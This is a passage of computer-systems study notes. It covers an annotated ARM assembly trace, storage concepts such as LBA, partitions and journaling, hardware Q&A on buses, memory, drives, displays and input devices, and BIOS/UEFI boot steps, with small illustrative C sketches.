Local Attacks
int power(long base, long exponent) {
    int counter;
    int result = 1;
    for (counter = 0; counter < exponent; counter++)
        result *= base;
    return result;
}
/* When the processor enters the function body, the arguments are already placed in registers: r0 = 5 (base), r1 = 3 (exponent) */
cmp r1, #0 /* Compare exponent to 0 */
mov r2, #1 /* Place constant 1 in register r2; this corresponds to result = 1 in C code */
ble .L2 /* Exponent (3) is not less than or equal to 0, so no jump to .L2 */
mov r3, #0 /* Place constant 0 in register r3; this corresponds to variable counter */
add r3, r3, #1 /* Perform r3 = 0 + 1, which stores 1 in r3; this corresponds to the first invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (1 in this case) to exponent (3); the result is used by the bne instruction below */
mul r2, r0, r2 /* Perform r2 = r0 * r2, which places 1 * 5 = 5 in r2; this corresponds to the first invocation of result *= base in C code */
bne .L3 /* Counter is not equal to exponent, so we jump back to .L3; this corresponds to the first invocation of counter < exponent in C code */
add r3, r3, #1 /* Perform r3 = 1 + 1, which stores 2 in r3; this corresponds to the second invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (2 in this case) to exponent (3); the result is used by the bne instruction below */
mul r2, r0, r2 /* Perform r2 = r0 * r2, which places 5 * 5 = 25 in r2; this corresponds to the second invocation of result *= base in C code */
bne .L3 /* Counter is not equal to exponent, so we jump back to .L3; this corresponds to the second invocation of counter < exponent in C code */
add r3, r3, #1 /* Perform r3 = 2 + 1, which stores 3 in r3; this corresponds to the third invocation of counter++ in C code */
cmp r3, r1 /* Compare counter (3 in this case) to exponent (3); the result is used by the bne instruction below */
mul r2, r0, r2 /* Perform r2 = r0 * r2, which places 25 * 5 = 125 in r2; this corresponds to the third invocation of result *= base in C code */
bne .L3 /* Counter is equal to exponent, so we DO NOT jump back to .L3 */
mov r0, r2 /* Copy register r2 contents (125) to register r0 */
bx lr /* Jump back to caller */
/* Function returns with 125 placed in r0; this is where the caller should expect the return value */
/* The other registers still hold whatever values were left there: r1 = 3, r2 = 125, r3 = 3 */
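The trace shows that the compiler tests the exponent once before the loop and then checks the exit condition at the bottom of the loop body. A minimal sketch of that control flow written back in C, with local variables named after the registers; the function name `power_as_compiled` is made up for illustration and the code is not compiler output:

```c
#include <assert.h>

/* Follows the instruction order of the trace; r0..r3 stand in for registers. */
int power_as_compiled(long r0 /* base */, long r1 /* exponent */) {
    long r2 = 1;          /* mov r2, #1      : result = 1        */
    long r3;
    if (r1 <= 0)          /* cmp r1, #0 ; ble .L2                */
        goto L2;
    r3 = 0;               /* mov r3, #0      : counter = 0       */
L3:
    r3 = r3 + 1;          /* add r3, r3, #1  : counter++         */
    r2 = r0 * r2;         /* mul r2, r0, r2  : result *= base    */
    if (r3 != r1)         /* cmp r3, r1 ; bne .L3                */
        goto L3;
    assert(r3 == r1);     /* the loop exits only when counter equals exponent */
L2:
    return (int)r2;       /* mov r0, r2 ; bx lr                  */
}
```

Calling `power_as_compiled(5, 3)` walks through the same three loop iterations as the trace.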
Storage abstractions
What is a block device?
In computing (specifically data transmission and data storage), a block, sometimes called a physical record, is a sequence of bytes or bits, usually containing some whole number of records, having a maximum length, a block size.[1] Data thus structured are said to be blocked. The process of putting data into blocks is called blocking, while deblocking is the process of extracting data from blocks. Blocked data is normally stored in a data buffer and read or written a whole block at a time.
What is logical block addressing and what are the benefits compared to the older cylinder-head-sector addressing method in terms of hard disks?
Logical block addressing (LBA) is a common scheme used for specifying the location of blocks of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme: blocks are located by an integer index, with the first block being LBA 0, the second LBA 1, and so on. Cylinder-head-sector, also known as CHS, is an early method that addresses each physical block of data on a hard disk drive by its cylinder, head and sector number, so the operating system has to know the physical geometry of the drive. In the case of floppy drives, for which the same exact diskette medium can be truly low-level formatted to different capacities, this is still true. The benefit of LBA is that software no longer depends on the physical geometry: the drive translates each block index to a physical location internally, and the size limits imposed by the CHS fields no longer apply.
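The relationship between the two schemes can be written down as a short conversion. This is a sketch using the usual mapping LBA = (C × heads + H) × sectors + (S − 1); the struct and function names are chosen here for illustration, and the geometry values are whatever the drive reports:

```c
#include <assert.h>
#include <stdint.h>

/* Disk geometry: heads per cylinder and sectors per track. */
struct geometry { uint32_t heads; uint32_t sectors; };

/* CHS -> LBA. Sector numbers start at 1 in CHS, hence the (s - 1). */
uint32_t chs_to_lba(struct geometry g, uint32_t c, uint32_t h, uint32_t s) {
    assert(h < g.heads && s >= 1 && s <= g.sectors);
    return (c * g.heads + h) * g.sectors + (s - 1);
}

/* LBA -> CHS, the inverse mapping. */
void lba_to_chs(struct geometry g, uint32_t lba,
                uint32_t *c, uint32_t *h, uint32_t *s) {
    *c = lba / (g.heads * g.sectors);
    *h = (lba / g.sectors) % g.heads;
    *s = (lba % g.sectors) + 1;
}
```

With 16 heads and 63 sectors per track, the first sector of the second cylinder (C=1, H=0, S=1) is LBA 1008.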
What is a disk partition?
Disk partitioning is the creation of one or more regions on a hard disk or other secondary storage, so that an operating system can manage information in each region separately.[1] Partitioning is typically the first step of preparing a newly manufactured disk, before any files or directories have been created.
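As an illustration of how partition boundaries are recorded, the sketch below decodes one entry of a classic MBR partition table. It assumes the disk uses the MBR scheme (four 16-byte entries starting at byte offset 446 of the first sector) rather than GPT; the struct and function names are made up for this example:

```c
#include <assert.h>
#include <stdint.h>

struct partition {
    uint8_t  bootable;   /* 1 if the entry is flagged active (0x80) */
    uint8_t  type;       /* partition type byte, e.g. 0x83 for Linux */
    uint32_t first_lba;  /* first sector of the partition */
    uint32_t sectors;    /* length of the partition in sectors */
};

/* Read a 32-bit little-endian value from a byte buffer. */
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode partition entry `index` (0..3) from a 512-byte MBR sector. */
struct partition mbr_partition(const uint8_t sector[512], int index) {
    assert(index >= 0 && index < 4);
    const uint8_t *e = sector + 446 + 16 * index;
    struct partition p;
    p.bootable  = (e[0] == 0x80);
    p.type      = e[4];
    p.first_lba = le32(e + 8);
    p.sectors   = le32(e + 12);
    return p;
}
```

The operating system uses `first_lba` and `sectors` to treat each region as if it were a separate disk.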
What is a file system?
In computing, a file system (or filesystem) is used to control how data is stored and retrieved. Without a file system, information placed in a storage area would be one large body of data with no way to tell where one piece of information stops and the next begins. By separating the data into individual pieces, and giving each piece a name, the information is easily separated and identified. Taking its name from the way paper-based information systems are named, each group of data is called a "file". The structure and logic rules used to manage the groups of information and their names is called a "file system".
What is journaling in terms of filesystems and what are the benefits? Name some journaled filesystems in use nowadays.
A journaling file system is a file system that keeps track of changes not yet committed to the file system's main part by recording the intentions of such changes in a data structure known as a "journal", which is usually a circular log. In the event of a system crash or power failure, such file systems can be brought back online more quickly and with a lower likelihood of becoming corrupted.
Journaled file systems in use nowadays include ext3, ext4, XFS, NTFS and JFS. In the Linux operating system, JFS is supported with the kernel module (since the kernel version 2.4.18pre9-ac4) and the complementary userspace utilities packaged under the name JFSutils. Most Linux distributions support JFS, unless it is specifically removed due to space restrictions or other concerns.
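The idea of recording intentions first can be shown with a toy model. This is a simplified sketch, not how any real file system lays out its journal: all names and sizes are invented, and the "disk" is just an array in memory.

```c
#include <assert.h>

#define BLOCKS 8
#define JOURNAL_SLOTS 4

struct journal_entry { int block; int value; };

struct toy_fs {
    int data[BLOCKS];                            /* the "main part" of the file system */
    struct journal_entry journal[JOURNAL_SLOTS]; /* recorded intentions */
    int pending;                                 /* number of entries in the journal */
    int committed;                               /* 1 once the transaction is complete */
};

/* Step 1: record the intended change in the journal only. */
void journal_write(struct toy_fs *fs, int block, int value) {
    assert(fs->pending < JOURNAL_SLOTS && block >= 0 && block < BLOCKS);
    fs->journal[fs->pending].block = block;
    fs->journal[fs->pending].value = value;
    fs->pending++;
}

/* Step 2: mark the transaction as complete. */
void journal_commit(struct toy_fs *fs) {
    fs->committed = 1;
}

/* Step 3 (also run after a crash): replay committed entries, discard the rest. */
void journal_recover(struct toy_fs *fs) {
    if (fs->committed)
        for (int i = 0; i < fs->pending; i++)
            fs->data[fs->journal[i].block] = fs->journal[i].value;
    fs->pending = 0;
    fs->committed = 0;
}
```

If the system "crashes" before `journal_commit`, recovery simply drops the half-finished transaction, so the main data is never left partially updated.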
Hardware
Computer hardware
Jargon: CPU, RAM, ROM, HDD, SSD, PCI, PCI Express, USB 2.0, USB 3.0, VGA, HDMI, DVI, LCD, TFT, LED, OLED, AMOLED, CRT, PWM
Lecture recording #1, Lecture recording #2 starting 12:30, Lecture slides
Random access memory, permanent storage, buses, input devices, display technologies, networking
Potential exam questions:
Different buses and their uses
A bus is a system that transfers data between components inside a computer or between computers. There are two types of buses: internal buses inside the computer (e.g. on an Asus Socket 7 motherboard) and external buses outside the computer (e.g. PC Card or IEEE-488).
- PCI
- Peripheral Component Interconnect, is a local computer bus for attaching hardware devices in a computer. Attached devices can take either the form of an integrated circuit fitted onto the motherboard itself or an expansion card that fits into a slot. Typical PCI cards used in PCs include: network cards, sound cards, modems, extra ports such as USB or serial, TV tuner cards and disk controllers.
- PCI Express
- Peripheral Component Interconnect Express (also called PCIe), is a high-speed serial computer expansion bus standard designed to replace the older PCI, PCI-X, and AGP bus standards. PCIe has numerous improvements over the older standards, including higher maximum system bus throughput, lower I/O pin count and smaller physical footprint, better performance scaling for bus devices, a more detailed error detection and reporting mechanism, and native hot-plug functionality. More recent revisions of the PCIe standard provide hardware support for I/O virtualization.
- Mini PCIe
- It is based on PCI Express technology. Its small size and the wide variety of connections it supports make it suitable for USB 2.0 cards, SIM cards, Wi-Fi and Bluetooth cards, and 3G and GPS cards.
- ExpressCard
- It is an interface to connect peripheral devices to a computer, usually a laptop computer. ExpressCards can connect a variety of devices to a computer including mobile broadband modems, IEEE 1394 (FireWire) connectors, USB connectors, Ethernet network ports, Serial ATA storage devices, solid-state drives, external enclosures for desktop-size PCI Express graphics cards and other peripheral devices, wireless network interface controllers (NIC), TV tuner cards, Common Access Card (CAC) readers, and sound cards.
What are the differences between hard disk drive (HDD) and solid state drive (SSD)?
The traditional spinning hard drive (HDD) is the basic nonvolatile storage on a computer. Hard drives are essentially metal platters with a magnetic coating which stores the data. A read/write head on an arm accesses the data while the platters are spinning in a hard drive enclosure. An SSD does the same job as an HDD, but instead of a magnetic coating on top of platters, the data is stored on interconnected flash memory chips that retain the data even when there's no power present. An SSD therefore has no moving parts.
Attribute | SSD (Solid State Drive) | HDD (Hard Disk Drive) |
---|---|---|
Power Draw / Battery Life | Less power draw, averages 2 – 3 watts, resulting in 30+ minute battery boost | More power draw, averages 6 – 7 watts and therefore uses more battery |
Cost | Expensive, roughly $0.10 per gigabyte (based on buying a 1TB drive) | Only around $0.06 per gigabyte, very cheap (buying a 4TB model) |
Capacity | Typically not larger than 1TB for notebook size drives; 1TB max for desktops | Typically around 500GB and 2TB maximum for notebook size drives; 6TB max for desktops |
Operating System Boot Time | Around 10-13 seconds average bootup time | Around 30-40 seconds average bootup time |
Noise | There are no moving parts and as such no sound | Audible clicks and spinning can be heard |
Vibration | No vibration as there are no moving parts | The spinning of the platters can sometimes result in vibration |
Heat Produced | Lower power draw and no moving parts so little heat is produced | HDD doesn’t produce much heat, but it will have a measurable amount more heat than an SSD due to moving parts and higher power draw |
Failure Rate | Mean time between failure rate of 2.0 million hours | Mean time between failure rate of 1.5 million hours |
File Copy / Write Speed | Generally above 200 MB/s and up to 550 MB/s for cutting edge drives | The range can be anywhere from 50 – 120MB / s |
Encryption | Full Disk Encryption (FDE) Supported on some models | Full Disk Encryption (FDE) Supported on some models |
File Opening Speed | Up to 30% faster than HDD | Slower than SSD |
Magnetism Affected? | An SSD is safe from any effects of magnetism | Magnets can erase data |
What is the purpose of Flash Translation Layer in terms of solid state drives?
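A flash translation layer (FTL) is used to adapt a fully functional file system to the constraints and restrictions imposed by flash memory devices. Flash pages cannot be overwritten in place and must be erased in larger blocks first, so the FTL maps the logical block addresses seen by the file system to physical flash pages and makes the drive look like an ordinary block device.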
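A toy model of the address mapping a flash translation layer maintains. This is a sketch under strong simplifications: page counts and all names are invented, and garbage collection and wear leveling, which a real FTL also has to handle, are left out.

```c
#include <assert.h>

#define LOGICAL_PAGES 4
#define PHYSICAL_PAGES 8
#define UNMAPPED (-1)

struct toy_ftl {
    int map[LOGICAL_PAGES];     /* logical page -> physical page */
    int flash[PHYSICAL_PAGES];  /* page contents */
    int stale[PHYSICAL_PAGES];  /* 1 if the page holds outdated data */
    int next_free;              /* next never-written physical page */
};

void ftl_init(struct toy_ftl *f) {
    for (int i = 0; i < LOGICAL_PAGES; i++) f->map[i] = UNMAPPED;
    for (int i = 0; i < PHYSICAL_PAGES; i++) { f->flash[i] = 0; f->stale[i] = 0; }
    f->next_free = 0;
}

/* Every write goes to a fresh physical page and the map is updated.
   Returns 0 on success, -1 when no free page is left
   (a real FTL would garbage-collect stale pages at this point). */
int ftl_write(struct toy_ftl *f, int logical, int value) {
    assert(logical >= 0 && logical < LOGICAL_PAGES);
    if (f->next_free >= PHYSICAL_PAGES) return -1;
    if (f->map[logical] != UNMAPPED) f->stale[f->map[logical]] = 1;
    f->flash[f->next_free] = value;
    f->map[logical] = f->next_free++;
    return 0;
}

/* Reads follow the map, so the caller never sees the physical location. */
int ftl_read(const struct toy_ftl *f, int logical) {
    assert(logical >= 0 && logical < LOGICAL_PAGES && f->map[logical] != UNMAPPED);
    return f->flash[f->map[logical]];
}
```

Writing the same logical page twice leaves the old physical page marked stale and points the map at the new one, which is why the file system above can keep using fixed block numbers.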
What are the differences between volatile/non-volatile, RAM, ROM, EEPROM and where are they used?
RAM is Random Access Memory. ROM is Read Only Memory.
RAM is the memory available for the operating system, programs and processes to use when the computer is running. ROM is the memory that comes with your computer that is pre-written to hold the instructions for booting up the computer.
RAM requires a flow of electricity to retain data (e.g. the computer powered on). ROM will retain data without the flow of electricity (e.g. when the computer is powered off).
RAM is a type of volatile memory. Data in RAM is not permanently written. When you power off your computer the data stored in RAM is lost.
ROM is a type of non-volatile memory. Data in ROM is permanently written and is not erased when you power off your computer.
There are different types of RAM, including DRAM (Dynamic Random Access Memory) and SRAM (Static Random Access Memory). There are different types of ROM, including PROM (programmable read-only memory), which is manufactured as blank memory and can be programmed once, and EPROM (erasable programmable read-only memory).
There are many differences between RAM and ROM memory but there are also a couple of similarities (and these are very easy to remember). Both are types of memory used by a computer, and they are both required for your computer to operate properly and efficiently.
EEPROM, or electrically erasable programmable read only memory, is another step up from EPROM because EEPROM chips do away with some of its drawbacks. For example, EEPROM chips do not need to be removed to be rewritten. Additionally, a portion of the chip can be changed without erasing the entire chip. Furthermore, it does not require special equipment to rewrite the chip.
Volatile memory | Non-volatile memory |
---|---|
Requires a power source to retain information. | Does not require a power source to retain information. |
When power source is disconnected, information is lost or deleted. | When power source is disconnected, information is not deleted. |
Often used for temporary retention of data, such as with RAM, or for retention of sensitive data. | Often used for long-term retention of data, such as files and folders. |
What is data retention?
Data retention defines the policies of persistent data and records management for meeting legal and business data archival requirements.
What are the differences between asynchronous/synchronous, dynamic/static RAM and where are they used?
Synchronous Circuits: These are the class of sequential circuits which are governed by a global clock signal generated by an oscillator. The state of all elements of a synchronous circuit changes only on application of the distributed clock signal, which makes the state of a synchronous circuit predictable. Synchronous circuits are also less susceptible to noise and circuit anomalies, and hence safer to design and operate. But their operating speed is limited by the propagation delay of the clock signal in reaching all the elements of the circuit. The period of the clock signal must be long enough to accommodate the longest propagation delay. Practically all circuits today are synchronous, except for parts where the speed of operation is crucial.
Asynchronous Circuits:
Asynchronous circuits change state only through the inputs they receive. Their operation is nearly instantaneous since they don't have to wait for a clock pulse; they are limited only by the propagation delay of the logic gates. But asynchronous circuits can transition into a wrong state when two inputs arrive at the wrong times relative to each other. This is called a race condition. Asynchronous circuits are quite difficult to design for reliable operation. They are used primarily in high speed systems such as signal processing hardware.
The basic difference between static and dynamic RAM lies mainly in structure and working principle.
• Structure: a dynamic RAM cell typically needs only one transistor and one capacitor, while six to eight MOS transistors are necessary for a static RAM cell.
• Data is stored as a charge in a capacitor in dynamic RAM, whereas data is stored in a flip-flop in static RAM.
• The charge in a dynamic RAM capacitor leaks away, so dynamic RAM has to be refreshed periodically while it is in use; static RAM needs no refreshing.
• A dynamic RAM cell takes up less space on the chip than a static RAM cell.
• Dynamic RAM is used to build larger main memory, whereas static RAM is used for speed-sensitive cache.
• Static RAM is about 4 times more expensive than dynamic RAM.
• Dynamic RAM consumes less power than static RAM.
• Static RAM takes less time to access data than dynamic RAM.
• Dynamic RAM has higher storage capacity. It can store about 4 times as much as static RAM.
What is cache? What is cache coherence?
Cache is a very fast, small memory placed between the CPU and the main memory. Cache coherence is the consistency of shared resource data that ends up stored in multiple local caches. When clients in a system maintain caches of a common memory resource, problems may arise with inconsistent data, which is particularly the case with CPUs in a multiprocessing system.
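The inconsistency problem and one way of avoiding it can be shown with a toy model of two CPUs caching a single memory word. This sketch uses a simple write-through, write-invalidate rule chosen for illustration; real coherence protocols track more states per cache line, and all names here are invented.

```c
#include <assert.h>

#define CPUS 2

struct toy_system {
    int memory;         /* one shared memory word */
    int cached[CPUS];   /* each CPU's private copy */
    int valid[CPUS];    /* 1 if that copy may be used */
};

/* Read: use the local copy if it is valid, otherwise fetch from memory. */
int cpu_read(struct toy_system *s, int cpu) {
    assert(cpu >= 0 && cpu < CPUS);
    if (!s->valid[cpu]) {
        s->cached[cpu] = s->memory;
        s->valid[cpu] = 1;
    }
    return s->cached[cpu];
}

/* Write: update memory and the local copy, and invalidate every other copy. */
void cpu_write(struct toy_system *s, int cpu, int value) {
    assert(cpu >= 0 && cpu < CPUS);
    s->memory = value;
    s->cached[cpu] = value;
    s->valid[cpu] = 1;
    for (int other = 0; other < CPUS; other++)
        if (other != cpu)
            s->valid[other] = 0;
}
```

Without the invalidation loop in `cpu_write`, the second CPU would keep returning its old cached value after the first CPU has written a new one.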
What are differences between resistive and capacitive touchscreen? [2]
A resistive touchscreen consists of several layers, of which the flexible plastic layer and the glass layer are the two important electrically resistive ones. The front surface of a resistive touchscreen panel is scratch-resistant plastic with a coating of conductive material (mostly Indium Tin Oxide, ITO) on its underside.
The second important layer is made of either glass or hard plastic and is also coated with ITO.
The two layers face each other and are separated by a thin gap. A voltage is applied so that current runs from top to bottom in one layer and from side to side in the other.
When a finger or stylus tip presses down on the outer surface, the two ITO films meet. Measuring the resistance of both layers at the point of contact gives an accurate measurement of the touch position. The accuracy also relies on the evenness of the ITO coating on both layers.
A capacitive touchscreen also consists of two spaced layers of glass, which are coated with a conductor such as Indium Tin Oxide (ITO). The human body is an electrical conductor. When a finger touches the glass of the capacitive surface, it changes the local electrostatic field. The system continuously monitors the capacitance at each point of the surface to find the exact area where the finger touched the screen.
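For the resistive case, the position measurement comes down to scaling one analog reading per axis. A minimal sketch, assuming the controller digitizes the voltage picked up at the contact point with an ADC and that the reading grows linearly with position; the function name, ADC range and screen size are assumptions made for the example:

```c
#include <assert.h>

/* Convert a raw ADC reading (0..adc_max) from one resistive layer
   into a pixel coordinate (0..pixels-1) by linear scaling. */
int touch_coordinate(int adc_value, int adc_max, int pixels) {
    assert(adc_max > 0 && pixels > 0);
    assert(adc_value >= 0 && adc_value <= adc_max);
    return (int)((long)adc_value * (pixels - 1) / adc_max);
}
```

The same function would be called twice per touch, once with the reading for the horizontal layer and once for the vertical layer.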
Explain how a computer mouse works. History of the computer mouse.
Ball mouse and optical mouse
How does a ball mouse actually work? As you move it across your desk, the ball rolls under its own weight and pushes against two plastic rollers linked to thin wheels. One of the wheels detects movements in an up-and-down direction (like the y-axis on graph/chart paper); the other detects side-to-side movements (like the x-axis on graph paper).
How do the wheels measure your hand movements? As you move the mouse, the ball moves the rollers that turn one or both of the wheels. If you move the mouse straight up, only the y-axis wheel turns; if you move to the right, only the x-axis wheel turns. And if you move the mouse at an angle, the ball turns both wheels at once. Now here's the clever bit. Each wheel is made up of plastic spokes and, as it turns, the spokes repeatedly break a light beam. The more the wheel turns, the more times the beam is broken. So counting the number of times the beam is broken is a way of precisely measuring how far the wheel has turned and how far you've pushed the mouse. The counting and measuring is done by the microchip inside the mouse, which sends details down the cable to your computer. Software in your computer moves the cursor on your screen by a corresponding amount.
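The counting step can be sketched as a one-line calculation. The sketch assumes the slotted wheel turns once per roller revolution and that the roller does not slip on the ball; the number of spokes and the roller circumference are invented parameters, not values from any particular mouse:

```c
#include <assert.h>

/* Distance moved along one axis, in micrometres, from the number of
   times the light beam was broken. */
long mouse_distance_um(long pulses, int spokes_per_turn,
                       long roller_circumference_um) {
    assert(spokes_per_turn > 0);
    return pulses * roller_circumference_um / spokes_per_turn;
}
```

A plain count like this gives distance but not direction; telling left from right needs additional information, for example a second sensor on the same wheel.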
An optical mouse works in a completely different way. It shines a bright light down onto your desk from an LED (light-emitting diode) mounted on the bottom of the mouse. The light bounces straight back up off the desk into a photocell (photoelectric cell), also mounted under the mouse, a short distance from the LED. The photocell has a lens in front of it that magnifies the reflected light, so the mouse can respond more precisely to your hand movements. As you push the mouse around your desk, the pattern of reflected light changes, and the chip inside the mouse uses this to figure out how you're moving your hand.
History: the mouse was invented by Douglas Engelbart in 1964 and consisted of a wooden shell, circuit board and two metal wheels that came into contact with the surface it was being used on.
Explain how a computer keyboard works. (HowStuffWorks article, Explain that Stuff article)
Keyboard
There are three separate layers of plastic that work together to detect your key presses. Two of them are covered in electrically conducting metal tracks and there's an insulating layer between them with holes in it. The dots on the sheets are places where the keys press the two conducting layers together. The lines are electrical connections that allow tiny electric currents to flow when the layers are pressed tight to one another by a key moving down from above.
A closeup of the underside of one key shows how it works. There's one set of electrical connections on the lower sheet of plastic, printed in light gray. The other set is on the upper sheet of plastic and printed in dark gray. The two sheets are kept apart by a clear plastic layer except at the holes, which is where the keys push down to make the two sheets touch.
Keyboards and typing technology have come a long way over the past couple centuries. The first typing devices were designed and patented in the 1700s while the first manufactured typing devices came about in the 1870s. These machines featured “blind typing” technology, where characters were printed on upside-down pages that remained unseen until completion. Since then, we have seen several updates in design, layout, technology, and function that are more efficient and user-friendly.
Explain how cathode ray tube (CRT) based screen technology works and name pros/cons. [3]
Short for cathode-ray tube, CRT monitors were the only choice consumers had for monitor technology for many years. Cathode ray tube (CRT) technology has been in use for more than 100 years, and is found in most televisions and computer monitors. A CRT works by moving an electron beam back and forth across the back of the screen. Each time the beam makes a pass across the screen, it lights up phosphor dots on the inside of the glass tube, thereby illuminating the active portions of the screen. By drawing many such lines from the top to the bottom of the screen, it creates an entire screen of images.
Resolution
Resolution on a CRT is flexible, and a newer model will provide you with viewing resolutions of up to 1600 by 1200 and higher. On a CRT the sharpness of the picture can be blemished by soft edges or a flawed focus. A CRT monitor can be viewed from almost any angle.
Refresh Rate
Some users of a CRT may notice a bit of an annoying flicker, which is an inherent trait based on a CRT's physical components. Today's graphics cards, however, can provide a high refresh rate signal to the CRT to get rid of this otherwise annoying problem.
Screen (viewable) Size
Most people today tend to look at a 17-inch CRT or bigger monitor. When you purchase a 17-inch CRT monitor, you usually get 16.1 inches or a bit more of actual viewing area, depending on the brand and manufacturer of a specific CRT.
Physical Size
There is no denying that an LCD wins in terms of its physical size and the space it needs. CRT monitors are big, bulky and heavy. They are not a good choice if you're working with limited desk space, or need to move the monitor around (for some odd reason) between computers.
Explain how liquid crystal displays (LCD) work and name pros/cons. [4]
Short for liquid crystal display, LCD technology can be found in digital watches and computer monitors. LCD displays use two sheets of polarizing material with a liquid crystal solution between them. An electric current passed through the liquid causes the crystals to align so that light cannot pass through them. Each crystal, therefore, is like a shutter, either allowing light to pass through or blocking the light. Color LCD displays use two basic techniques for producing color: Passive matrix is the less expensive of the two technologies. The other technology, called thin film transistor (TFT) or active-matrix, produces color images that are as sharp as traditional CRT displays, but the technology is expensive.
Resolution
On an LCD the resolution is fixed within each monitor (called a native resolution). The resolution on an LCD can be changed, but if you're running it at a resolution other than its native resolution you will notice a drop in performance or quality. Both types of monitors (newer models) provide bright and vibrant color display. However, LCDs cannot display the maximum color range that a CRT can. In terms of image sharpness, when an LCD is running at its native resolution the picture quality is perfectly sharp. On a CRT the sharpness of the picture can be blemished by soft edges or a flawed focus. A CRT monitor can be viewed from almost any angle, but with an LCD this is often a problem. When you use an LCD, your view changes as you move to different angles and distances away from the monitor. At some odd angles, you may notice the picture fade, and possibly look as if it will disappear from view.
Refresh Rate
Some users of a CRT may notice a bit of an annoying flicker, which is an inherent trait based on a CRT's physical components. Today's graphics cards, however, can provide a high refresh rate signal to the CRT to get rid of this otherwise annoying problem. LCDs are flicker-free and as such the refresh rate isn't an important issue with LCDs.
Dot Pitch
Dot pitch refers to the space between the pixels that make up the images on your screen, and is measured in millimeters. The less space between pixels, the better the image quality. On either type of monitor, smaller dot pitch is better and you're going to want to look at something in the 0.26 mm dot pitch or smaller range.
Screen (viewable) Size
Most people today tend to look at a 17-inch CRT or bigger monitor. When you purchase a 17-inch CRT monitor, you usually get 16.1 inches or a bit more of actual viewing area, depending on the brand and manufacturer of a specific CRT. The difference between the "monitor size" and the "view area" is due to the large bulky frame of a CRT. If you purchase a 17" LCD monitor, you actually get a full 17" viewable area, or very close to a 17".
Physical Size
There is no denying that an LCD wins in terms of its physical size and the space it needs. CRT monitors are big, bulky and heavy. They are not a good choice if you're working with limited desk space, or need to move the monitor around (for some odd reason) between computers. An LCD on the other hand is small, compact and lightweight. LCDs are thin, take up far less space and are easy to move around. An average 17-inch CRT monitor could be upwards of 40 pounds, while a 17-inch LCD would weigh in at around 15 pounds.
Price
As an individual one-time purchase an LCD monitor is going to be more expensive. Throughout a lifetime, however, LCDs are cheaper as they are known to have a longer lifespan and also a lower power consumption. The cost of both technologies has come down over the past few years, and LCDs are reaching a point where smaller monitors are within many consumers' price range. You will pay more for a 17" LCD compared to a 17" CRT, but since the CRT's actual viewing size is smaller, it does bring the question of price back into proportion. Today, fewer CRT monitors are manufactured as the price on LCDs lowers and they become mainstream.
Name screen technologies making use of thin film transistor (TFT) technology? [5]
A thin-film transistor (TFT) is a special kind of field-effect transistor made by depositing thin films of an active semiconductor layer as well as the dielectric layer and metallic contacts over a supporting (but non-conducting) substrate. A common substrate is glass, because the primary application of TFTs is in liquid-crystal displays. This differs from the conventional transistor, where the semiconductor material typically is the substrate, such as a silicon wafer.
Name uses for light polarization filters? [6] [7]
Polarization filters are used on camera lenses in photography and in the LCD panels of TVs and monitors.
What are the benefits of twisted pair cabling and differential signalling?
Twisted pair cabling
Electrical noise going into or coming from the cable can be prevented.[10] Cross-talk is minimized.
Differential signalling
The technique minimizes electronic crosstalk and electromagnetic interference, both noise emission and noise acceptance, and can achieve a constant or known characteristic impedance, allowing impedance matching techniques important in a high-speed signal transmission line or high quality balanced line and balanced circuit audio signal path.
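Why differential signalling rejects noise can be seen in a few lines of arithmetic. This is an idealized sketch: voltages are plain integers (think millivolts), the noise is assumed to hit both wires equally, and the function names are invented for the example.

```c
#include <assert.h>

/* The sender drives the two wires with opposite polarity. */
void diff_send(int signal, int *wire_p, int *wire_n) {
    *wire_p = signal;
    *wire_n = -signal;
}

/* The receiver looks only at the difference between the wires,
   so anything added equally to both wires cancels out. */
int diff_receive(int wire_p, int wire_n) {
    return (wire_p - wire_n) / 2;
}
```

Twisting the pair helps make that assumption hold, because both wires are exposed to nearly the same interference along the cable.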
Active matrix vs passive matrix in display technology
Active-matrix display : An active-matrix display, also known as a TFT (thin-film transistor) display, uses a separate transistor to apply charges to each liquid crystal cell and thus displays high-quality color that is viewable from all angles.
Passive-matrix display : A passive-matrix display uses fewer transistors, requires less power, and is less expensive than an active-matrix display. The color on a passive-matrix display often is not as bright as an active-matrix display. Users view images on a passive-matrix display best when working directly in front of it.
Compare FAT32 and NTFS
NTFS
NTFS is the preferred file system for this version of Windows. It has many benefits over the earlier FAT32 file system, including:
The capability to recover from some disk-related errors automatically, which FAT32 cannot.
Improved support for larger hard disks.
Better security because you can use permissions and encryption to restrict access to specific files to approved users.
FAT32
FAT32, and the lesser-used FAT, were used in earlier versions of Windows operating systems, including Windows 95, Windows 98, and Windows Millennium Edition. FAT32 does not have the security that NTFS provides, so if you have a FAT32 partition or volume on your computer, any user who has access to your computer can read any file on it. FAT32 also has size limitations. You cannot create a FAT32 partition greater than 32GB in this version of Windows, and you cannot store a file larger than 4GB on a FAT32 partition.
Bootloaders, kernels
What is the role of BIOS/UEFI in x86-based machines?
BIOS
• BIOS (Basic Input/Output System) is read from EEPROM and copied to RAM
• Processor starts executing the BIOS code in RAM
• BIOS sets up the hardware and probes storage, USB etc. for bootable media
• BIOS reads the master boot record of the selected bootable media and the boot loader takes over
UEFI
UEFI (Unified Extensible Firmware Interface) is a replacement for BIOS. It offers several advantages over the previous firmware interface:
• Ability to boot from large disks (over 2 TB) with a GUID Partition Table (GPT)
• CPU-independent architecture
• CPU-independent drivers
• Flexible pre-OS environment, including network capability
• Modular design
Explain step by step how an operating system is booted up, see slides for flowchart.
• The power button is pressed.
• CPU pins are reset and registers are set to specific values.
• CPU jumps to the address of the BIOS (0xFFFF0).
• BIOS runs POST (Power-On Self Test) and other necessary checks.
• BIOS loads the MBR (Master Boot Record) and jumps to it.
• Primary bootloader runs from the MBR and jumps to the secondary bootloader.
• Secondary bootloader loads the operating system.
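Two details of these steps can be checked with small helper functions. The sketch assumes classic BIOS booting: in real mode a physical address is segment × 16 + offset, so the address 0xFFFF0 corresponds to the pair F000:FFF0, and a first sector is treated as bootable when its last two bytes are 0x55 and 0xAA. The function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Real-mode physical address: segment * 16 + offset. */
uint32_t real_mode_address(uint16_t segment, uint16_t offset) {
    return ((uint32_t)segment << 4) + offset;
}

/* A 512-byte first sector carries the boot signature 0x55 0xAA
   in its last two bytes. */
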